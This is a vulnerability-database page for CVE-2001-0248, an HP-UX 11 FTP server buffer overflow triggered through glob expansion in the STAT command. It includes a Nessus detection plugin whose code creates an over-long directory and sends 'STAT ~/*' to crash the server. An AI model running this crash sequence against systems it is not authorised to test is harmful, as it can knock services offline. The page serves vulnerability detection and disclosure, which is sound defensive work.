Vulnerabilities > CVE-2001-0248 - Incorrect Calculation of Buffer Size vulnerability in multiple products

047910
CVSS 9.8 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
HIGH
network
low complexity
sgi
hp
CWE-131
critical
nessus
NVD
Published: 2001-06-18
Updated: 2024-02-02

Summary

Buffer overflow in FTP server in HPUX 11 allows remote attackers to execute arbitrary commands by creating a long pathname and calling the STAT command, which uses glob to generate long strings.

Vulnerable Configurations

Part Description Count
OS
Sgi
3
OS
Hp
1

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Overflow Buffers
    Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an attacker. As a consequence, an attacker is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the attackers' choice.
  • Buffer Overflow via Parameter Expansion
    In this attack, the target software is given input that the attacker knows will be modified and expanded in size during processing. This attack relies on the target software failing to anticipate that the expanded data may exceed some internal limit, thereby creating a buffer overflow.

Nessus

NASL familyFTP
NASL idHPFTP_GLOB_STAT.NASL
descriptionThe remote HPUX 11 FTP server is affected by a buffer overflow vulnerability. The overflow occurs when the STAT command is issued with an argument that expands into an oversized string after being processed by the
last seen2020-06-01
modified2020-06-02
plugin id11372
published2003-03-13
reporterThis script is Copyright (C) 2003-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/11372
titleHP-UX ftpd glob() Expansion STAT Buffer Overflow
code
#TRUSTED 6d5266df97b705de1c50a1688369822aa90e7254f2bd4b38e7521184216b3ce2b362264b51dfd677dbc0f04ed975068352cce88d6885c56134d819e2fca37649975b33b5541a0af6a78f7ddde2b5221350bb3284d17f7c381358a4ca417a7a4f9e970462a2192047c669713e8f2679457cc295b138d1eb372a5b7dc94c61a0ac74c334a406d2f626f96a3e24fb3a4fc12b2c1e97484407ece92242dd14112bdd94c0634dea5524c6a3e9e5caeaf4b471d0929a2e9228c65ffcf017f9799d6581596968d46f603ea47ab2cf50aadfe11c907ce49739ba7391667f6c2463910e094ce471cb6ae4a25ae5f9c7e9faf38c8a607dfd066910637b50020856e1cfdddd95c87405dcc9a3f3a96e29dc9af478d41ed436f884e776e36e00962693a596130c8cd8d6f258e3e0e52ed0c04dac4a457abe62192273c18b5220fec2a9f8328ab77ecf2251a2a7dab365e2ec62d7dc3885c0e90392c106f6b403667e550195464091806c4d65f99775d401cb31cbddcfca02743d49652849ce1cccd2a18ab43bb0a0831edee32751c797134469e531e5072d5037a9b3513e276ac38663513c5b7e157fe0163730293a427e603bc2155bdac9db479eeec5ef941882a6296d5600b16844367ac84fc72a07f1df851cc43dd60479b87856b4aaa2993d8fae589bdccbc3e95b604d375752edfe0d337d692c82ed61b05a47eae3e6ba21a662341275
###
# (C) Tenable Network Security, Inc.
#

# TODO: have not observed enough HP-UX FTP banners, safecheck
# is inaccurate and even wrong!
#
# TODO: do not check other FTPD 
#
# From COVERT-2001-02:
# "when an FTP daemon receives a request involving a
# file that has a tilde as its first character, it typically runs the
# entire filename string through globbing code in order to resolve the
# specified home directory into a full path.  This has the side effect
# of expanding other metacharacters in the pathname string, which can
# lead to very large input strings being passed into the main command
# processing routines. This can lead to exploitable buffer overflow
# conditions, depending upon how these routines manipulate their input."
#

include("compat.inc");

if (description)
{
 script_id(11372);
 script_version("1.29");
 script_cvs_date("Date: 2018/10/10 14:50:53");

 script_cve_id("CVE-2001-0248");
 script_bugtraq_id(2552);
 script_xref(name:"CERT-CC", value:"CA-2001-07");

 script_name(english:"HP-UX ftpd glob() Expansion STAT Buffer Overflow");
 script_summary(english:"Checks if the remote HPUX ftp can be buffer overflown");

 script_set_attribute(attribute:"synopsis", value:
"The remote FTP server is affected by a buffer overflow
vulnerability.");
 script_set_attribute(attribute:"description", value:
"The remote HPUX 11 FTP server is affected by a buffer overflow
vulnerability.  The overflow occurs when the STAT command is issued with
an argument that expands into an oversized string after being processed
by the 'glob()' function.");
 # https://web.archive.org/web/20040917154450/http://archives.neohapsis.com/archives/tru64/2002-q3/0017.html
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?91e769e0" );
 script_set_attribute(attribute:"solution", value:"Apply the patch from your vendor.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"cvss_score_source", value:"CVE-2001-0248");
 script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"vuln_publication_date", value:"2001/04/09");
 script_set_attribute(attribute:"plugin_publication_date", value:"2003/03/13");
 script_set_attribute(attribute:"patch_publication_date", value:"2002/09/10");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/o:hp:hp-ux");
 script_end_attributes();

 script_category(ACT_ATTACK);
 script_family(english:"FTP");

 script_copyright(english:"This script is Copyright (C) 2003-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

 script_dependencies("ftpserver_detect_type_nd_version.nasl", "ftp_writeable_directories.nasl");
 script_require_keys("ftp/login", "ftp/writeable_dir");
 script_require_ports("Services/ftp", 21);
 exit(0);
}

#
# The script code starts here :
#
include("global_settings.inc");
include("misc_func.inc");
include("ftp_func.inc");

# First, we need access
login = get_kb_item_or_exit("ftp/login");
password = get_kb_item("ftp/password");

port = get_ftp_port(default: 21);

# Then, we need a writeable directory
wri = get_kb_item("ftp/"+port+"/writeable_dir");
if (! wri) wri = get_kb_item_or_exit("ftp/writeable_dir");

# Connect to the FTP server
soc = ftp_open_and_authenticate( user:login, pass:password, port:port );
if ( soc )
	{
		# We are in

		c = 'CWD ' + string(wri) + '\r\n';
		send(socket:soc, data:c);
		b = ftp_recv_line(socket:soc);
		if(!egrep(pattern:"^250.*", string:b)) exit(0);
		mkd = 'MKD ' + crap(505) + '\r\n';	#505+4+2=511
		mkdshort = 'MKD ' + crap(249) + '\r\n';	#249+4+2=255
		stat = 'STAT ~/*\r\n';

		send(socket:soc, data:mkd);
		b = ftp_recv_line(socket:soc);
		if(!egrep(pattern:"^257 .*", string:b)) {
			#If the server refuse to creat a long dir for some 
			#reason, try a short one to see if it will die.
			send(socket:soc, data:mkdshort);
			b = ftp_recv_line(socket:soc);
			if(!egrep(pattern:"^257 .*", string:b)) exit(0);
		}

		#STAT use control channel
		send(socket:soc, data:stat);
		b = ftp_recv_line(socket:soc);
		if(!b){
			security_hole(port);
			exit(0);
		} else {
			ftp_close(socket:soc);
		}

	}

References